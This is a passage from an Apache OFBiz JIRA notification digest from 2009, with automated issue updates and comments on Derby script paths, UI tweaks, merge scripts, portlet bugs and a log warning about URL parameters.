 1- HM='-Dderby.system.home=/data/derby'(There is no /data/derby 
 folder.. possibly it should be /runtime/data/derby)
 2- CP=-cp $EE/derby.jar:$EE/derbytools.jar  (There is no derby.jar, and 
 derbytools.jar in the OFBiz package -- but there is derby-10.4.1.3.jar) 
 Suggested Solution:
 1-  Replace HM='-Dderby.system.home=data/derby'  with 
 HM='-Dderby.system.home=runtime/data/derby'
 2- Copy derby.jar and derbytools.jar from the derby distribution to 
 framework/entity/lib/jdbc directory.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-2273) Add Tiny Text Box for Entity Name Search

2009-04-25 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2273?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-2273.
--

   Resolution: Fixed
Fix Version/s: SVN trunk
 Assignee: Ashish Vijaywargiya

Thanks Ritika,

Your patch is in trunk at revision: 768616  
I just noticed a trailing space in the ftl file and a triling space in the 
groovy file.

Thanks Ashish for idea and 1st review

 Add Tiny Text Box for Entity Name Search
 

 Key: OFBIZ-2273
 URL: https://issues.apache.org/jira/browse/OFBIZ-2273
 Project: OFBiz
  Issue Type: Improvement
  Components: framework
Reporter: Ashish Vijaywargiya
Assignee: Ashish Vijaywargiya
 Fix For: SVN trunk

 Attachments: FilterByEntityName.patch


 Hello,
 https://localhost:8443/webtools/control/entitymaint
 In this above URL add the new text box by name Entity Name adjacent to 
 Group combo.
 We should search the string similar to the Contains option work in most of 
 the search Screens.
 So the resultant search area will become :
 Group : Group Search Combo BoxEntity Name : Entity Name search text box   
 Submit Query Button.
 This will help us to see the entity related to same containing text in the 
 short area instead of moving down the page.
 --
 Ashish Vijaywargiya

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-968) Show phone numbers in EditPartyClassificationGroupParties

2009-04-25 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-968?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12702821#action_12702821
 ] 

Jacques Le Roux commented on OFBIZ-968:
---

Hi Lapog,

Why not showing all numbers ?

 Show phone numbers in EditPartyClassificationGroupParties
 -

 Key: OFBIZ-968
 URL: https://issues.apache.org/jira/browse/OFBIZ-968
 Project: OFBiz
  Issue Type: New Feature
  Components: party
Affects Versions: SVN trunk
Reporter: David Shere
Priority: Minor
 Fix For: SVN trunk


 I will be working on a patch to include a party's phone number on the 
 EditPartyClassificationGroupParties screen.  I'll need to look up the 
 PartyContactMech and TelecomNumber.  Should I add a beanshell script to this 
 screen, or can I do it all in the FTL?

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2287) Update ofbiz.apache.org, log.ofbiz.org and build.ofbiz.org to have the footer stuck to the bottom of the browser

2009-04-25 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2287?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12702822#action_12702822
 ] 

Jacques Le Roux commented on OFBIZ-2287:


BTW, there is no anonymous access yet

 Update ofbiz.apache.org, log.ofbiz.org and build.ofbiz.org to have the footer 
 stuck to the bottom of the browser
 

 Key: OFBIZ-2287
 URL: https://issues.apache.org/jira/browse/OFBIZ-2287
 Project: OFBiz
  Issue Type: Improvement
  Components: site
Affects Versions: SVN trunk
Reporter: Tim Ruppert
Assignee: Tim Ruppert
 Fix For: SVN trunk


 Just like was done on the template in docs.ofbiz.org, update the page 
 structure and CSS to support the footer going to the bottom of the browser if 
 there is too little content for it to already be there.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2313) Support of BigDecimal to WebPos

2009-04-25 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2313?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12702823#action_12702823
 ] 

Jacques Le Roux commented on OFBIZ-2313:


Backported at r767457 for R9.04

 Support of BigDecimal to WebPos
 ---

 Key: OFBIZ-2313
 URL: https://issues.apache.org/jira/browse/OFBIZ-2313
 Project: OFBiz
  Issue Type: Bug
  Components: specialpurpose/webpos
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Marco Risaliti
Assignee: Marco Risaliti
Priority: Minor
 Fix For: Release Branch 9.04, SVN trunk

 Attachments: WebPos_BigDecimal.patch




-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2129) Moving definitively from MyPage to MyPortal / Home

2009-04-25 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2129?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12702825#action_12702825
 ] 

Jacques Le Roux commented on OFBIZ-2129:


Hi Hans,

Should we not close now ?

 Moving definitively from MyPage to MyPortal / Home
 --

 Key: OFBIZ-2129
 URL: https://issues.apache.org/jira/browse/OFBIZ-2129
 Project: OFBiz
  Issue Type: Improvement
  Components: specialpurpose/myportal
Affects Versions: SVN trunk
Reporter: Bruno Busco
 Fix For: Release Branch 9.04


 The MyPage application should be deleted if all functionality have been moved 
 to MyPortal.
 Moreover I would suggest to do the following:
 1) Move all screenlets that are now defined in MyPortal but are strictly 
 related to other applications (i.e. projectmgr) to their respective 
 applications.
 2) Rename the MyPortal to Home application, have it mounted on / and (may 
 be later) move it to the framework when no dependency to the applications are 
 left
 3) For the new functionalities that have been developed in MyPage/MyPortal 
 (i.e. communications) we should think where to place them
 4) The actual way of integrate the new portalPages into the AppBarMenu is not 
 compatible with the Widget version of the AppBarMenu (in the Example 
 application the AppBarMenu has been reverted to the .FTL version just for 
 this reason). I think we should find a way to integrate the PortalPages to 
 the Widget version of the AppBar.
 What do you think?

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2355) ij.ofbiz does not work

2009-04-26 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2355?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12702858#action_12702858
 ] 

Jacques Le Roux commented on OFBIZ-2355:


Hi Tamer,

As this will change in time, and we don't want to update  ij.ofbiz each time, 
it's the responsibility of user to make the change in ij.ofbiz locally.

 ij.ofbiz does not work
 --

 Key: OFBIZ-2355
 URL: https://issues.apache.org/jira/browse/OFBIZ-2355
 Project: OFBiz
  Issue Type: Bug
Affects Versions: SVN trunk
 Environment: Linux, SVN Revision: 767865
Reporter: Tamer Sezgin
Assignee: Jacques Le Roux
Priority: Trivial
 Fix For: Release Branch 9.04, SVN trunk

 Attachments: ij.ofbiz.patch, ij.ofbiz.patch

   Original Estimate: 0.17h
  Remaining Estimate: 0.17h

 It seems ij.ofbiz in the root directory  does not work..
 I could see 2 problems inside.
 1- HM='-Dderby.system.home=/data/derby'(There is no /data/derby 
 folder.. possibly it should be /runtime/data/derby)
 2- CP=-cp $EE/derby.jar:$EE/derbytools.jar  (There is no derby.jar, and 
 derbytools.jar in the OFBiz package -- but there is derby-10.4.1.3.jar) 
 Suggested Solution:
 1-  Replace HM='-Dderby.system.home=data/derby'  with 
 HM='-Dderby.system.home=runtime/data/derby'
 2- Copy derby.jar and derbytools.jar from the derby distribution to 
 framework/entity/lib/jdbc directory.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2355) ij.ofbiz does not work

2009-04-26 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2355?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12702860#action_12702860
 ] 

Jacques Le Roux commented on OFBIZ-2355:


Tamer,

Finally I did it at r768686 for trunk and r768687 for  R9.04 

 ij.ofbiz does not work
 --

 Key: OFBIZ-2355
 URL: https://issues.apache.org/jira/browse/OFBIZ-2355
 Project: OFBiz
  Issue Type: Bug
Affects Versions: SVN trunk
 Environment: Linux, SVN Revision: 767865
Reporter: Tamer Sezgin
Assignee: Jacques Le Roux
Priority: Trivial
 Fix For: Release Branch 9.04, SVN trunk

 Attachments: ij.ofbiz.patch, ij.ofbiz.patch

   Original Estimate: 0.17h
  Remaining Estimate: 0.17h

 It seems ij.ofbiz in the root directory  does not work..
 I could see 2 problems inside.
 1- HM='-Dderby.system.home=/data/derby'(There is no /data/derby 
 folder.. possibly it should be /runtime/data/derby)
 2- CP=-cp $EE/derby.jar:$EE/derbytools.jar  (There is no derby.jar, and 
 derbytools.jar in the OFBiz package -- but there is derby-10.4.1.3.jar) 
 Suggested Solution:
 1-  Replace HM='-Dderby.system.home=data/derby'  with 
 HM='-Dderby.system.home=runtime/data/derby'
 2- Copy derby.jar and derbytools.jar from the derby distribution to 
 framework/entity/lib/jdbc directory.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-2358) Update the Demo Server List to Show 904 instead of 40 release

2009-04-26 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2358?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-2358.
--

Resolution: Fixed

Thanks Tim,

Commited at revision: 768688  

Jacques


 Update the Demo Server List to Show 904 instead of 40 release
 -

 Key: OFBIZ-2358
 URL: https://issues.apache.org/jira/browse/OFBIZ-2358
 Project: OFBiz
  Issue Type: Bug
  Components: product
Affects Versions: SVN trunk
Reporter: Tim Ruppert
Assignee: Tim Ruppert
Priority: Minor
 Fix For: SVN trunk

 Attachments: demoServersTo904.patch


 I made the changes necessary - including changing the link to the 
 Alternative Demo Sites page to use the tiny URL so I could change the name 
 to house all of the demo servers :) 

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2247) use order numbers as return ids

2009-04-26 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2247?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12702872#action_12702872
 ] 

Jacques Le Roux commented on OFBIZ-2247:


There are 2 things weird  :
* Which repository are you using ? The release number, 2995, is odd
* We don't want to apply any new feature to a release, only bug fixes, so this 
should be a diff with trunk

 use order numbers as return ids
 ---

 Key: OFBIZ-2247
 URL: https://issues.apache.org/jira/browse/OFBIZ-2247
 Project: OFBiz
  Issue Type: New Feature
  Components: accounting
Affects Versions: Release Branch 4.0
 Environment: all
Reporter: Albert Mayo
Priority: Minor
 Fix For: Release Branch 4.0

 Attachments: OrderIdForReturns.diff


 I needed functionality for the return numbers to pull from order sequence 
 pool. I have programmed the feature, copying the functionality of returns 
 using the invoice sequence pool.  I'm new at it, but I've attached what I 
 think is an SVN patch.  I've done minimal testing and it works.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Updated: (OFBIZ-2332) searchorders security related error

2009-04-26 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2332?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux updated OFBIZ-2332:
---

Description: 
I found this one in error.log on demo server

2009-04-19 16:10:30,520 (TP-Processor17) [ServiceEventHandler.java:399:ERROR] 
=== Found URL parameter [partyId] passed to secure (https) 
request-map with uri [searchorders] with an event that calls service 
[findOrders]; this is not allowed for security reasons! The data should be 
encrypted by making it part of the request body (a form field) instead of the 
request URL.; In session [DF1819F1BFDCDFE831FD1ED3B5B2FE88.jvm1]; Note that 
this can be changed using the service.http.parameters.require.encrypted 
property in the url.properties file

2 cases
a 
href=@ofbizUrl/searchorders?lookupFlag=YhideFields=YpartyId=${partyId}viewIndex=1viewSize=20/@ofbizUrl
 class=buttontext${uiLabelMap.OrderOtherOrders}/a

a 
href=/ordermgr/control/searchorders?lookupFlag=YhideFields=YpartyId=${partyRow.partyId
 + externalKeyParam}viewIndex=1viewSize=20${uiLabelMap.OrderOrders}/a



  was:
I found this one in error.log on demo server

2009-04-19 16:10:30,520 (TP-Processor17) [ServiceEventHandler.java:399:ERROR] 
=== Found URL parameter [partyId] passed to secure (https) 
request-map with uri [searchorders] with an event that calls service 
[findOrders]; this is not allowed for security reasons! The data should be 
encrypted by making it part of the request body (a form field) instead of the 
request URL.; In session [DF1819F1BFDCDFE831FD1ED3B5B2FE88.jvm1]; Note that 
this can be changed using the service.http.parameters.require.encrypted 
property in the url.properties file

2 cases
a 
href=@ofbizUrl/searchorders?lookupFlag=YhideFields=YpartyId=${partyId}viewIndex=1viewSize=20/@ofbizUrl
 class=buttontext${uiLabelMap.OrderOtherOrders}/a

a 
href=/ordermgr/control/searchorders?lookupFlag=YhideFields=YpartyId=${partyRow.partyId
 + externalKeyParam}viewIndex=1viewSize=20${uiLabelMap.OrderOrders}/a

I will see later, I continue to look at error.log, to see how much we can get 
from here...
[ Afficher » ]
Jacques Le Roux added a comment - 20/avr./09 12:09 PM I found this one in 
error.log on demo server 2009-04-19 16:10:30,520 (TP-Processor17) 
[ServiceEventHandler.java:399:ERROR] === Found URL parameter 
[partyId] passed to secure (https) request-map with uri [searchorders] with an 
event that calls service [findOrders]; this is not allowed for security 
reasons! The data should be encrypted by making it part of the request body (a 
form field) instead of the request URL.; In session 
[DF1819F1BFDCDFE831FD1ED3B5B2FE88.jvm1]; Note that this can be changed using 
the service.http.parameters.require.encrypted property in the url.properties 
file 2 cases a 
href=@ofbizUrl/searchorders?lookupFlag=YhideFields=YpartyId=${partyId}viewIndex=1viewSize=20/@ofbizUrl
 class=buttontext${uiLabelMap.OrderOtherOrders}/a a 
href=/ordermgr/control/searchorders?lookupFlag=YhideFields=YpartyId=${partyRow.partyId
 + externalKeyParam}viewIndex=1viewSize=20${uiLabelMap.OrderOrders}/a I 
will see later, I continue to look at error.log, to see how much we can get 
from here...



 searchorders security related error
 ---

 Key: OFBIZ-2332
 URL: https://issues.apache.org/jira/browse/OFBIZ-2332
 Project: OFBiz
  Issue Type: Sub-task
  Components: order
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Jacques Le Roux
 Fix For: Release Branch 9.04, SVN trunk


 I found this one in error.log on demo server
 2009-04-19 16:10:30,520 (TP-Processor17) [ServiceEventHandler.java:399:ERROR] 
 === Found URL parameter [partyId] passed to secure (https) 
 request-map with uri [searchorders] with an event that calls service 
 [findOrders]; this is not allowed for security reasons! The data should be 
 encrypted by making it part of the request body (a form field) instead of the 
 request URL.; In session [DF1819F1BFDCDFE831FD1ED3B5B2FE88.jvm1]; Note that 
 this can be changed using the service.http.parameters.require.encrypted 
 property in the url.properties file
 2 cases
 a 
 href=@ofbizUrl/searchorders?lookupFlag=YhideFields=YpartyId=${partyId}viewIndex=1viewSize=20/@ofbizUrl
  class=buttontext${uiLabelMap.OrderOtherOrders}/a
 a 
 href=/ordermgr/control/searchorders?lookupFlag=YhideFields=YpartyId=${partyRow.partyId
  + externalKeyParam}viewIndex=1viewSize=20${uiLabelMap.OrderOrders}/a

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-2247) use order numbers as return ids

2009-04-26 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2247?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-2247.
--

Resolution: Won't Fix
  Assignee: Jacques Le Roux

We don't apply new feature to a release. Morevoer please read 
http://docs.ofbiz.org/display/OFBADMIN/OFBiz+Contributors+Best+Practices before 
submitting a patch

Thanks

 use order numbers as return ids
 ---

 Key: OFBIZ-2247
 URL: https://issues.apache.org/jira/browse/OFBIZ-2247
 Project: OFBiz
  Issue Type: New Feature
  Components: accounting
Affects Versions: Release Branch 4.0
 Environment: all
Reporter: Albert Mayo
Assignee: Jacques Le Roux
Priority: Minor
 Fix For: Release Branch 4.0

 Attachments: OrderIdForReturns.diff


 I needed functionality for the return numbers to pull from order sequence 
 pool. I have programmed the feature, copying the functionality of returns 
 using the invoice sequence pool.  I'm new at it, but I've attached what I 
 think is an SVN patch.  I've done minimal testing and it works.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-2011) Cannot Create Customer in Create New Party Detail

2009-04-26 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2011?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-2011.
--

Resolution: Incomplete
  Assignee: Jacques Le Roux

As soon as you have a reliable SMTP server, this error should disappear

 Cannot Create Customer in Create New Party Detail
 -

 Key: OFBIZ-2011
 URL: https://issues.apache.org/jira/browse/OFBIZ-2011
 Project: OFBiz
  Issue Type: Bug
  Components: party
Affects Versions: SVN trunk
Reporter: Manuel Málaga
Assignee: Jacques Le Roux
 Attachments: access_log_2008_10_20.txt, customercreation.bmp, 
 screenshot-1.jpg, screenshot-2.jpg


 ScreenShot 1:
 After I entered all the required data for the new customer, the system 
 generates the Party ID but not save the Party.
 Create Prospect and Create Employee do the same.
 ScreenShot 2:
 List for 100 contained in Party ID.
 Party ID's 10004 and 10005 were used by Create Customer and Create Prospect 

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-2325) Tree widget doesn't apply parameter tag as Menu

2009-04-26 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2325?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-2325.
--

   Resolution: Fixed
Fix Version/s: SVN trunk
   Release Branch 9.04
 Assignee: Jacopo Cappellato

Thanks dukian,

Your patch is in trunk at r768811 and R9.04 at r768814  

A special mention to Jacopo, without his comment this would have been harder to 
test ;)

 Tree widget doesn't apply parameter tag as Menu
 ---

 Key: OFBIZ-2325
 URL: https://issues.apache.org/jira/browse/OFBIZ-2325
 Project: OFBiz
  Issue Type: Bug
  Components: framework
Affects Versions: SVN trunk
Reporter: dukian
Assignee: Jacopo Cappellato
Priority: Minor
 Fix For: Release Branch 9.04, SVN trunk

 Attachments: TreeWidget.patch


 Tree widget doesn't apply parameter tag as Menu. So I clone related code to 
 tree widget.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Assigned: (OFBIZ-2296) Return adjustments do not get refunded unless there is at least 1 line item

2009-04-26 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2296?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux reassigned OFBIZ-2296:
--

Assignee: Jacques Le Roux

 Return adjustments do not get refunded unless there is at least 1 line item
 ---

 Key: OFBIZ-2296
 URL: https://issues.apache.org/jira/browse/OFBIZ-2296
 Project: OFBiz
  Issue Type: Bug
  Components: order
Affects Versions: Release Branch 4.0, SVN trunk
Reporter: Brian Sanders
Assignee: Jacques Le Roux

 If you create a return that contains only adjustments, processRefundReturn 
 does not step into the code where the actual refund occurs. It looks like 
 someone made an attempt to address the issue in the latest trunk (as of 
 today), but did not succeed. Furthermore, 
 org.ofbiz.order.order.OrderReturnServices.groupReturnItemsByOrder() is also 
 at fault because if I try to iterate over the order totals map, it's empty.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2393) Portlet category list not displayed on add portlet screen

2009-04-30 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2393?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12704736#action_12704736
 ] 

Jacques Le Roux commented on OFBIZ-2393:


Hi Hans,

Either solutions is fine with me, but please keep the trunk and R9.04 
consistent, thanks

 Portlet category list not displayed on add portlet screen
 -

 Key: OFBIZ-2393
 URL: https://issues.apache.org/jira/browse/OFBIZ-2393
 Project: OFBiz
  Issue Type: Bug
  Components: specialpurpose/myportal
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Jyotsna Rathore
Assignee: Jacopo Cappellato
Priority: Minor
 Fix For: Release Branch 9.04, SVN trunk

 Attachments: portletCategoryList.patch


 Getting error in displaying list of portlet categories on Add Portlet screen.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2404) Improved functionality of mergefromtrunk.sh

2009-05-01 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2404?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12704947#action_12704947
 ] 

Jacques Le Roux commented on OFBIZ-2404:


I have still to work on the Windows version. Actually I commited it by 
accident. But as I believe I'm the only commiter still working on Winfows 
(though maybe Adrian also) I did not revert (it's not bad, it's incomplete). I 
can explain the issue I stumbled upon if interested. Anyway I should fix it 
this weekend... I will close this issue then...

Thanks

 Improved functionality of mergefromtrunk.sh
 ---

 Key: OFBIZ-2404
 URL: https://issues.apache.org/jira/browse/OFBIZ-2404
 Project: OFBiz
  Issue Type: Improvement
  Components: ALL COMPONENTS
Affects Versions: Release Branch 9.04
Reporter: Ashish Vijaywargiya
Priority: Trivial
 Fix For: Release Branch 9.04

 Attachments: merge_from_trunk_improved.patch


 As I discussed on the mailing list before few days to add Log Details from 
 the trunk revision number when we apply changes to release branch.
 For more details you can see the discussion done on dev list with subject 
 Update the log message details in mergefromtrunk.sh file ?
 Here I am uploading patch for Unix based OS (Please help me to do the same 
 changes in *.bat file, I am not in touch with Windows since last 4 years so 
 can't help much to prepare batch file)
 Thanks !
 --
 Ashish Vijaywargiya

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Assigned: (OFBIZ-2404) Improved functionality of mergefromtrunk.sh

2009-05-01 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2404?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux reassigned OFBIZ-2404:
--

Assignee: Jacques Le Roux

 Improved functionality of mergefromtrunk.sh
 ---

 Key: OFBIZ-2404
 URL: https://issues.apache.org/jira/browse/OFBIZ-2404
 Project: OFBiz
  Issue Type: Improvement
  Components: ALL COMPONENTS
Affects Versions: Release Branch 9.04
Reporter: Ashish Vijaywargiya
Assignee: Jacques Le Roux
Priority: Trivial
 Fix For: Release Branch 9.04

 Attachments: merge_from_trunk_improved.patch


 As I discussed on the mailing list before few days to add Log Details from 
 the trunk revision number when we apply changes to release branch.
 For more details you can see the discussion done on dev list with subject 
 Update the log message details in mergefromtrunk.sh file ?
 Here I am uploading patch for Unix based OS (Please help me to do the same 
 changes in *.bat file, I am not in touch with Windows since last 4 years so 
 can't help much to prepare batch file)
 Thanks !
 --
 Ashish Vijaywargiya

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2393) Portlet category list not displayed on add portlet screen

2009-05-01 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2393?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12704994#action_12704994
 ] 

Jacques Le Roux commented on OFBIZ-2393:


Finally it was fine to have it for test of mergefromtrunk.bat :)

Backported in R9.04 at r770678

 Portlet category list not displayed on add portlet screen
 -

 Key: OFBIZ-2393
 URL: https://issues.apache.org/jira/browse/OFBIZ-2393
 Project: OFBiz
  Issue Type: Bug
  Components: specialpurpose/myportal
Affects Versions: Release Branch 9.04, SVN trunk
Reporter: Jyotsna Rathore
Assignee: Jacopo Cappellato
Priority: Minor
 Fix For: Release Branch 9.04, SVN trunk

 Attachments: portletCategoryList.patch


 Getting error in displaying list of portlet categories on Add Portlet screen.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2404) Improved functionality of mergefromtrunk.sh

2009-05-01 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2404?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12704996#action_12704996
 ] 

Jacques Le Roux commented on OFBIZ-2404:


Right Ashish,

I keep on keeping this old behaviour of do it yourself. Anyway, almost 
finally done for Windows at r770683
I wonder if explaning the problem will not have been longer ;)...

Also I would like to be able to make several commits in one pass. This because, 
since svn:mergeingo has been introduced recetnly by Subversion, most of the 
time you need to update your R9.04 local copie before back porting changes. So 
having only one svn up and then several commits would be faster... A for loop 
should be used for that... I will see later


 Improved functionality of mergefromtrunk.sh
 ---

 Key: OFBIZ-2404
 URL: https://issues.apache.org/jira/browse/OFBIZ-2404
 Project: OFBiz
  Issue Type: Improvement
  Components: ALL COMPONENTS
Affects Versions: Release Branch 9.04
Reporter: Ashish Vijaywargiya
Assignee: Jacques Le Roux
Priority: Trivial
 Fix For: Release Branch 9.04

 Attachments: merge_from_trunk_improved.patch


 As I discussed on the mailing list before few days to add Log Details from 
 the trunk revision number when we apply changes to release branch.
 For more details you can see the discussion done on dev list with subject 
 Update the log message details in mergefromtrunk.sh file ?
 Here I am uploading patch for Unix based OS (Please help me to do the same 
 changes in *.bat file, I am not in touch with Windows since last 4 years so 
 can't help much to prepare batch file)
 Thanks !
 --
 Ashish Vijaywargiya

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2404) Improved functionality of mergefromtrunk.sh

2009-05-01 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2404?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12704997#action_12704997
 ] 

Jacques Le Roux commented on OFBIZ-2404:


As someone used/tested this new Linux version ? Should we commit it ?

 Improved functionality of mergefromtrunk.sh
 ---

 Key: OFBIZ-2404
 URL: https://issues.apache.org/jira/browse/OFBIZ-2404
 Project: OFBiz
  Issue Type: Improvement
  Components: ALL COMPONENTS
Affects Versions: Release Branch 9.04
Reporter: Ashish Vijaywargiya
Assignee: Jacques Le Roux
Priority: Trivial
 Fix For: Release Branch 9.04

 Attachments: merge_from_trunk_improved.patch


 As I discussed on the mailing list before few days to add Log Details from 
 the trunk revision number when we apply changes to release branch.
 For more details you can see the discussion done on dev list with subject 
 Update the log message details in mergefromtrunk.sh file ?
 Here I am uploading patch for Unix based OS (Please help me to do the same 
 changes in *.bat file, I am not in touch with Windows since last 4 years so 
 can't help much to prepare batch file)
 Thanks !
 --
 Ashish Vijaywargiya

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Commented: (OFBIZ-2339) No bullets rendered

2009-05-01 Thread Jacques Le Roux (JIRA)

[ 
https://issues.apache.org/jira/browse/OFBIZ-2339?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanelfocusedCommentId=12705047#action_12705047
 ] 

Jacques Le Roux commented on OFBIZ-2339:


I see that now bullets are rendered in Confuence, great!

Could it be possible to have different types of bullets in function of 
indentation ?

 No bullets rendered
 ---

 Key: OFBIZ-2339
 URL: https://issues.apache.org/jira/browse/OFBIZ-2339
 Project: OFBiz
  Issue Type: Sub-task
Reporter: Jacques Le Roux

 The styles associate with
 *
 and
 **
 are no longer rendering bullets.
 Could it be possible to differentiate simple indentation from bullet 
 (numbering is working well) ?

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-2404) Improved functionality of mergefromtrunk.sh

2009-05-01 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2404?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-2404.
--

Resolution: Fixed

Thanks Ashish, Vikas,

Ashish, your patch is in R9.04 at revision: 770755  


 Improved functionality of mergefromtrunk.sh
 ---

 Key: OFBIZ-2404
 URL: https://issues.apache.org/jira/browse/OFBIZ-2404
 Project: OFBiz
  Issue Type: Improvement
  Components: ALL COMPONENTS
Affects Versions: Release Branch 9.04
Reporter: Ashish Vijaywargiya
Assignee: Jacques Le Roux
Priority: Trivial
 Fix For: Release Branch 9.04

 Attachments: merge_from_trunk_improved.patch


 As I discussed on the mailing list before few days to add Log Details from 
 the trunk revision number when we apply changes to release branch.
 For more details you can see the discussion done on dev list with subject 
 Update the log message details in mergefromtrunk.sh file ?
 Here I am uploading patch for Unix based OS (Please help me to do the same 
 changes in *.bat file, I am not in touch with Windows since last 4 years so 
 can't help much to prepare batch file)
 Thanks !
 --
 Ashish Vijaywargiya

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.



[jira] Closed: (OFBIZ-2305) With the smoothfeather style the PDF link in the order detail screen is not working properly

2009-05-01 Thread Jacques Le Roux (JIRA)

 [ 
https://issues.apache.org/jira/browse/OFBIZ-2305?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux closed OFBIZ-2305.
--

   Resolution: Fixed
Fix Version/s: Release Branch 9.04
 Assignee: Tim Ruppert

Fixed in the new Bizness Time theme, not commited yet...

 With the smoothfeather style the PDF link in the order detail screen is not 
 working properly
 --

